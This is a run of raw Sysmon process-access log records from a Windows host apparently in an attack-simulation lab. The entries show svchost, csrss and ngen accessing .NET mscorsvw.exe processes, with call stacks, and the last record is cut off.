10341000x80000000000000008008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.088{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-B703-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.072{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-B703-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.072{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-B703-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9215-6005-B603-00000000A301}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.009{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9215-6005-B603-00000000A301}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:13.009{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9215-6005-B603-00000000A301}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:14.978{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9216-6005-C303-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:14.978{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9216-6005-C303-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:14.978{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9216-6005-C303-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:14.353{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9216-6005-C203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:14.337{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9216-6005-C203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:14.337{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9216-6005-C203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-CE03-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.806{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-CE03-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.806{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-CE03-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.744{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-CD03-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.728{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-CD03-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.728{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-CD03-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.681{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-CC03-00000000A301}2368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.666{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-CC03-00000000A301}2368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.666{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-CC03-00000000A301}2368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.603{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-CB03-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.587{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-CB03-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 